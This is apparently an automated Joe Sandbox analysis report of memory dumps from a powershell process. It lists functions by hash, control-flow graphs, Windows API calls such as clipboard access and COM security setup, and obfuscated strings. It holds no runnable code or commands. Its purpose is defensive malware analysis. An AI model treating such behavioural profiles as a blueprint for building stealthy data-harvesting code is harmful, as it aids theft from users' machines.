                                                                                                    • Opcode ID: d835f53a1ea35148f626fa04a724e7987134b0b528dae19f47ef4596169525c8
                                                                                                    • Instruction ID: fb70b11f59b15fa29a2dfd91de6a18c71a389cf2605028f6e69fa3e5fcc93465
                                                                                                    • Opcode Fuzzy Hash: d835f53a1ea35148f626fa04a724e7987134b0b528dae19f47ef4596169525c8
                                                                                                    • Instruction Fuzzy Hash: 2CA1F83150CBC28AD332863C98597DBAED15BE7324F484BADD5EC4B2E2C6754506C763

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1129 43478f-4347d3 1130 4347d8-4347e6 1129->1130 1130->1130 1131 4347e8 1130->1131 1132 4347ea-4347ed 1131->1132 1133 4347ef-43480a 1132->1133 1134 43480c-434a22 SysAllocString 1132->1134 1133->1132 1135 434a27-434a35 1134->1135 1135->1135 1136 434a37-434a41 1135->1136 1137 434a44-434a47 1136->1137 1138 434a95-434ad9 1137->1138 1139 434a49-434a93 1137->1139 1141 434ae3-434afa 1138->1141 1139->1137
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2525500382-4108050209
                                                                                                    • Opcode ID: 9d687ce6a53e54680157a481b97c72965d7bf5935ec7814364719e01cb4dc97e
                                                                                                    • Instruction ID: 7710ab4fa5aa3a568e2c37736857d9d7a1ef749e887715fab7162ae7f5592eff
                                                                                                    • Opcode Fuzzy Hash: 9d687ce6a53e54680157a481b97c72965d7bf5935ec7814364719e01cb4dc97e
                                                                                                    • Instruction Fuzzy Hash: 6CA1A420108FC2CAD332CA3C98987D7AFD15B67325F484B9DD0FA4A3E2D7652116C766

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1142 4359ab-435bc1 SysFreeString 1143 435bc6-435bd4 1142->1143 1143->1143 1144 435bd6 1143->1144 1145 435bd8-435bdb 1144->1145 1146 435be1-435c68 1145->1146 1147 435c6d-435cad 1145->1147 1146->1145 1149 435cb7-435cce 1147->1149
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3341692771-4108050209
                                                                                                    • Opcode ID: 83d9ce0e7760e8fae5532081dc651d746aa33cede4d69a6242a3362663563698
                                                                                                    • Instruction ID: 898d7bf58d2c0aac8d3ada66455043627c4072e6a1430190b97cd2d7f17ecba1
                                                                                                    • Opcode Fuzzy Hash: 83d9ce0e7760e8fae5532081dc651d746aa33cede4d69a6242a3362663563698
                                                                                                    • Instruction Fuzzy Hash: 7591A02010DFC2CED362C63C984C797BFD15B67224F184B9D91FE4A2D2CBA92546D726

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1150 40f512-40f683 CoInitializeEx * 2
                                                                                                    APIs
                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040F516
                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F66A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 9d3116aa6ebc2b6784c70dd4b92ad71632d4a05842fb47a9e9ce51398c6388d6
                                                                                                    • Instruction ID: b3fb3b11da8db31ca47e5784628e6313e90caef82b768de4ff9725ee3da2f1ca
                                                                                                    • Opcode Fuzzy Hash: 9d3116aa6ebc2b6784c70dd4b92ad71632d4a05842fb47a9e9ce51398c6388d6
                                                                                                    • Instruction Fuzzy Hash: B641B9B4D10B40ABD370BF3D9A4B7127EB4AB05214F50472DF9E68A6D4E630A4298BD7

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 00443E8A
                                                                                                    • GetForegroundWindow.USER32 ref: 00443E99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ForegroundWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2020703349-0
                                                                                                    • Opcode ID: fa7d56702ef1fcaf1dcf804961ff68700fc98e5e03e951403fc58b0dc47673e5
                                                                                                    • Instruction ID: b705f04c923530e9c4637aa2ebefbb7c58336f23265bea8e2fe5c5fb99bd31ec
                                                                                                    • Opcode Fuzzy Hash: fa7d56702ef1fcaf1dcf804961ff68700fc98e5e03e951403fc58b0dc47673e5
                                                                                                    • Instruction Fuzzy Hash: 5CE086FFD5081287EF0DDB91EC1A56A33217592304309413CE90257252DA3818069699
                                                                                                    APIs
                                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 0043D585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DefaultLanguageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 95929093-0
                                                                                                    • Opcode ID: c2e42903f1afeffc0fa12ec6e7b02c567462a1bb200fc73c4056f966fdf4482f
                                                                                                    • Instruction ID: 0df2b72e4f85776204e371014627610169083b5b649fae25ac5f29a5c77e25ad
                                                                                                    • Opcode Fuzzy Hash: c2e42903f1afeffc0fa12ec6e7b02c567462a1bb200fc73c4056f966fdf4482f
                                                                                                    • Instruction Fuzzy Hash: 1521B431A052404FE715CF79C998B59BFE26F9A310F1EC2EDC4559B3E6CA798905CB00
                                                                                                    APIs
                                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 0043D585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DefaultLanguageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 95929093-0
                                                                                                    • Opcode ID: 417e44cc5d7e17a0e8a85f86f5e37ed5158510bcc67ce6f5332d54eafa875309
                                                                                                    • Instruction ID: 2d7634791a3b75e7f2148c80e2788fff6ffe22c15c5eb83dd2b5de2a69aeb052
                                                                                                    • Opcode Fuzzy Hash: 417e44cc5d7e17a0e8a85f86f5e37ed5158510bcc67ce6f5332d54eafa875309
                                                                                                    • Instruction Fuzzy Hash: D211E932E056404FE305DF79D95875A7EE25B99320F1EC2ADC0548B3E7CA7D89098B11
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlanketProxy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3890896728-0
                                                                                                    • Opcode ID: 6a2ae1547be6999b2151da38da4630405a5b6de07503b436fb32bd5c90908a16
                                                                                                    • Instruction ID: 75c7145db70773df9a7d71813c30d60f6a34f18099da5c4ea2b89a34d7b44d41
                                                                                                    • Opcode Fuzzy Hash: 6a2ae1547be6999b2151da38da4630405a5b6de07503b436fb32bd5c90908a16
                                                                                                    • Instruction Fuzzy Hash: DD01EFB4A083418FE319DF29C9A475ABBE1BBC9308F04882DE495C7395C7B599088F86
                                                                                                    APIs
                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B881,00000000,00000001), ref: 00443172
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: bb9c39d33320b82b937e48397660ff7be44c6da15812c4777363c2322420ecb7
                                                                                                    • Instruction ID: 288f4351e884e9eea4d18428176eb76c0a04ad662247272cecf814cafade0c11
                                                                                                    • Opcode Fuzzy Hash: bb9c39d33320b82b937e48397660ff7be44c6da15812c4777363c2322420ecb7
                                                                                                    • Instruction Fuzzy Hash: 27E02B72514311ABE2016F257C09A1B7A64FFC6755F060836F404A2125D738E802C5AE
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,0044318B,?,0040B881,00000000,00000001), ref: 0044163E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: 7667549653231d608d4c520b091fed714c2ba7d054b61750316f7062bd880e87
                                                                                                    • Instruction ID: 99ccb09488f315f7662bece3b1de4b416a21561a618149de282664d427a8c4b5
                                                                                                    • Opcode Fuzzy Hash: 7667549653231d608d4c520b091fed714c2ba7d054b61750316f7062bd880e87
                                                                                                    • Instruction Fuzzy Hash: 0CD0A730019121EFD6006F15FC05B863798FF0B311F020871B404DB171C330EC4086D8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlanketProxy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3890896728-0
                                                                                                    • Opcode ID: 07eea3edc467954785eb78980f7ddb8808b6e6e8eaf7d696c5fa38fd62e6edca
                                                                                                    • Instruction ID: 9a2576813197e62dff9ddcee6951a477a13a86c644b346b617a5728f8157724e
                                                                                                    • Opcode Fuzzy Hash: 07eea3edc467954785eb78980f7ddb8808b6e6e8eaf7d696c5fa38fd62e6edca
                                                                                                    • Instruction Fuzzy Hash: 5FF028B4109701CFE310DF29D1A471ABBF1FB85348F10895CE5958B3A1D7B6A949DF82
                                                                                                    APIs
                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F037
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 640775948-0
                                                                                                    • Opcode ID: 775417ae7047b3928d932cf2e3bb966ab6775d40c1c9d83a8d8b68c5ae5668ea
                                                                                                    • Instruction ID: d52e6701ca0567ecea50fae5c95d71df8d0865217b97f1a700da3a29fef88c33
                                                                                                    • Opcode Fuzzy Hash: 775417ae7047b3928d932cf2e3bb966ab6775d40c1c9d83a8d8b68c5ae5668ea
                                                                                                    • Instruction Fuzzy Hash: DED0C9387C438076F2344B18EC53F1032569306F16F340328B366FE2E0C9D07520860D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                    • String ID: \
                                                                                                    • API String ID: 1006321803-2967466578
                                                                                                    • Opcode ID: 9b2748da6f7e3f167138353385b4f112a89cad5f74dbe50a52acad1aba691fe9
                                                                                                    • Instruction ID: 4899b08cad139046a0fb97dbd9210e10cf36c38bcb58f83a103a9d3e2791fce5
                                                                                                    • Opcode Fuzzy Hash: 9b2748da6f7e3f167138353385b4f112a89cad5f74dbe50a52acad1aba691fe9
                                                                                                    • Instruction Fuzzy Hash: 3751A07110C7828FD310AF7C998935FBFE0AB9A224F080A6DF8E5872D1D6788949D757
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00427643
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004276DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: Rz{8$Rz{8
                                                                                                    • API String ID: 237503144-1771129567
                                                                                                    • Opcode ID: e11e422a0dcf0f06df4e468d9eea5c3d92ee3ecfbf80dfbc541769fe6df54122
                                                                                                    • Instruction ID: d25a6fafbb66aa0d4983179632544c199d3d94c58000d8f402269383d3097f67
                                                                                                    • Opcode Fuzzy Hash: e11e422a0dcf0f06df4e468d9eea5c3d92ee3ecfbf80dfbc541769fe6df54122
                                                                                                    • Instruction Fuzzy Hash: 8C51BDB120C350AFE710CF25D98474FBBE5EBC6344F04892DE5A99B281D7B589098B97
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042CD77
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042CF16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: PV
                                                                                                    • API String ID: 237503144-3839218938
                                                                                                    • Opcode ID: 2cd26a2ac7bb077012b26eb56a86cd3114e4cc7c902589be86c5c4b80461f6ba
                                                                                                    • Instruction ID: 31eefcb5022962d952b219954383692c932da7c76ce7cab504b4ba26167b107e
                                                                                                    • Opcode Fuzzy Hash: 2cd26a2ac7bb077012b26eb56a86cd3114e4cc7c902589be86c5c4b80461f6ba
                                                                                                    • Instruction Fuzzy Hash: CD91DCB1E013108FEB04CF69C98579A7FB2FB45314F1582A9D9099F39ADB7988068FC1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                    • Opcode ID: 307d5b0574c3b6139724f80caa78f324feaf278ab7ed975f60f22a6ad75a9a41
                                                                                                    • Instruction ID: 5ab1e21fbc2f1ac905f872765b32d4f3f5908e62a666bb605fa0efc4bfb62081
                                                                                                    • Opcode Fuzzy Hash: 307d5b0574c3b6139724f80caa78f324feaf278ab7ed975f60f22a6ad75a9a41
                                                                                                    • Instruction Fuzzy Hash: 4EC15BB09093808FE370DF55C99878BBBE0BB85308F50891EE5AD9B354C7B95549CF8A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID: $&$1$@$B$D$F$H$J$L$N$x$z${$|$~
                                                                                                    • API String ID: 1927566239-2745819239
                                                                                                    • Opcode ID: 94676343526ae3ca23794756500635e67625a5d63dcc703819d6fe5bf71f7c12
                                                                                                    • Instruction ID: 0895315920332cccf0ad59a52f56d98742ded2ff71d4d02cfca7946025affc9a
                                                                                                    • Opcode Fuzzy Hash: 94676343526ae3ca23794756500635e67625a5d63dcc703819d6fe5bf71f7c12
                                                                                                    • Instruction Fuzzy Hash: 1D51AE7260C7C18AE335863C84583DEBED15BA6324F094BADD5ED8B3D2DAB90901C367
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit
                                                                                                    • String ID: $$&$0$9$<$>$hO[t
                                                                                                    • API String ID: 2610073882-1781011804
                                                                                                    • Opcode ID: f4d7061e78010d39094b614b5cd6fa4b71758ee71af922d8b1c50b98c440f65e
                                                                                                    • Instruction ID: f090bd7672ed50e0c5c37ffc2af227cc529e3923906a3fa37667e08f81141c93
                                                                                                    • Opcode Fuzzy Hash: f4d7061e78010d39094b614b5cd6fa4b71758ee71af922d8b1c50b98c440f65e
                                                                                                    • Instruction Fuzzy Hash: A841452261C7C18ED3358A3C884938BBED15BEB224F090BADD4E8873D2C6B44905C797
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: DUKL$H]@D$\BV_$gx
                                                                                                    • API String ID: 3664257935-1969664907
                                                                                                    • Opcode ID: 555c4182296861f141ea0aa2528a7a50f38c6cbc830c83645b878bc58654cf94
                                                                                                    • Instruction ID: 3c060069219604b5edc3c15b5ea3da6c4a1ad63ae3c82c84f6b79a984357563d
                                                                                                    • Opcode Fuzzy Hash: 555c4182296861f141ea0aa2528a7a50f38c6cbc830c83645b878bc58654cf94
                                                                                                    • Instruction Fuzzy Hash: 8D51667050C3D08FE725CF25886476BBBE0AFDA305F180A5EE8D95B382D6794904CB9B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2814822597.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_7be0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                    • API String ID: 0-1420252700
                                                                                                    • Opcode ID: 1ee667cc06de7deea19c13259fc259faba0ef3bc4852491db829f62bb10b1428
                                                                                                    • Instruction ID: 49c2d4d94a95ed2fd49f6c3dd0fcf55264bfac8ebf47b17fafda15ef29e635b4
                                                                                                    • Opcode Fuzzy Hash: 1ee667cc06de7deea19c13259fc259faba0ef3bc4852491db829f62bb10b1428
                                                                                                    • Instruction Fuzzy Hash: 691205F5B0431D8FDB258A6C980076ABBAAABD5310F2884EAD405CF395DF31C946C792
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2766363838.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_51b0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7c64db1e2f636af97e4aae16639cba0275cfcad60fef6a9f49a3a7e3aaf21d8
                                                                                                    • Instruction ID: f1e9f13742e9b76341f81ee2525a4f0d595399fe2696d825fbb314fcb19e32b9
                                                                                                    • Opcode Fuzzy Hash: b7c64db1e2f636af97e4aae16639cba0275cfcad60fef6a9f49a3a7e3aaf21d8
                                                                                                    • Instruction Fuzzy Hash: 0BD1DF74A092459FCB06CF6CC8949EAFBB2FF4A310B15829AD445DB362C775EC41CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2814822597.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_7be0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3c28f5fb36298cba0b7dc57cd9cce65d1e6735cfd1a5fea1b49ce2d832942d8
                                                                                                    • Instruction ID: fda335f131546029e10270406778f84e30870cdfcf700865b05cb58cc25d039a
                                                                                                    • Opcode Fuzzy Hash: c3c28f5fb36298cba0b7dc57cd9cce65d1e6735cfd1a5fea1b49ce2d832942d8
                                                                                                    • Instruction Fuzzy Hash: 4141D5F1B0030DDFEB20CE6C8901A6E7BAAEB85254B6D81E6D401DF356D731C946CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2766363838.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_51b0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f941904b9d78f53062749b720f90a0bf92cc8e67d04715c3ab1bb4ef6dd9e9bd
                                                                                                    • Instruction ID: a93b56fbe5cd1d6e2c9b1fd0180291205496c81a4175570c3869c1176ed9a76a
                                                                                                    • Opcode Fuzzy Hash: f941904b9d78f53062749b720f90a0bf92cc8e67d04715c3ab1bb4ef6dd9e9bd
                                                                                                    • Instruction Fuzzy Hash: 2A4125B4A001059FDB19CF89D1999BAFBB2FF48310B11819AD506AB365C772FC50CFA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2766363838.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_51b0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5cd464ba908ad0b0defd5f092576094946619fa8bf7a67efa9835b4233700a7f
                                                                                                    • Instruction ID: 1ec21408c03efb03cc815ea8e4e589212bc9363c8a92d0398007c0f0e994758d
                                                                                                    • Opcode Fuzzy Hash: 5cd464ba908ad0b0defd5f092576094946619fa8bf7a67efa9835b4233700a7f
                                                                                                    • Instruction Fuzzy Hash: 42215BB4A042199FCB04CF5CC4809AEBBB1FF89300B158596E815EB356C731ED41CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2766363838.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_51b0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fdb92c1dabfb4880ae8e375c7f982ef3ca7b4c8d67ab11022107f09af8785ddf
                                                                                                    • Instruction ID: dc1e7860100db15984caf0f4edf60466b8cd9908f0ff6892514f558a629499d9
                                                                                                    • Opcode Fuzzy Hash: fdb92c1dabfb4880ae8e375c7f982ef3ca7b4c8d67ab11022107f09af8785ddf
                                                                                                    • Instruction Fuzzy Hash: B3215B74A042498FCB01CF68D4909EABBB4FF49310B15859AE858EB352C731EC45CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2764212379.000000000501D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0501D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_501d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a83ed74aa268aef8816dcb38625766238cbf984f78de877333515a460bf61374
                                                                                                    • Instruction ID: b3693439d8700db0fc05679504ea07d5fd33e31360002d3a2ec36b0012d848f7
                                                                                                    • Opcode Fuzzy Hash: a83ed74aa268aef8816dcb38625766238cbf984f78de877333515a460bf61374
                                                                                                    • Instruction Fuzzy Hash: 7E01B17240D3809FD7534B25DC94766BFA8EF43224F09849BED888F293C2689C45C772
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2764212379.000000000501D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0501D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_501d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03624871dd5837e98d085d9323a4302c3121a52d38142fa72fcf6ddf7317ceda
                                                                                                    • Instruction ID: 0e20957739c454a263290f0f1a66e12a44499668dd84f6205732e81d95b9f7ad
                                                                                                    • Opcode Fuzzy Hash: 03624871dd5837e98d085d9323a4302c3121a52d38142fa72fcf6ddf7317ceda
                                                                                                    • Instruction Fuzzy Hash: 41012B324083009AE7528A39DDC4B6FBFD8EF41324F08C529ED490B246C379D841C6B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2814822597.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_7be0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-1608119003
                                                                                                    • Opcode ID: c7d0d1076d23e79653e1121cc2e1a804a5ef56f5990854075e2ca4a626e0c0cc
                                                                                                    • Instruction ID: 4f2fcb39d74ea53c70d6780de8e04fb924e89118f27d60cd7625ef5f84b25f0a
                                                                                                    • Opcode Fuzzy Hash: c7d0d1076d23e79653e1121cc2e1a804a5ef56f5990854075e2ca4a626e0c0cc
                                                                                                    • Instruction Fuzzy Hash: 38F1F6F1B0421E8FEB159A6C98006AABBEAEFD5311F2484BAD405CF351DB31D946C7E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2814822597.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_7be0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-1608119003
                                                                                                    • Opcode ID: 95e9b3cf198918c08897a813d236c3447a5ba7ca2e9d203d60703445319c1ae5
                                                                                                    • Instruction ID: 3a1b5704dead4553ef8156dde317b268b3eef57b3cb94f464457e8f18f78cafd
                                                                                                    • Opcode Fuzzy Hash: 95e9b3cf198918c08897a813d236c3447a5ba7ca2e9d203d60703445319c1ae5
                                                                                                    • Instruction Fuzzy Hash: 0FA168F17043168FE7256A79980066ABBFAEFC5620F2884ABD445CF351DF71C846C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
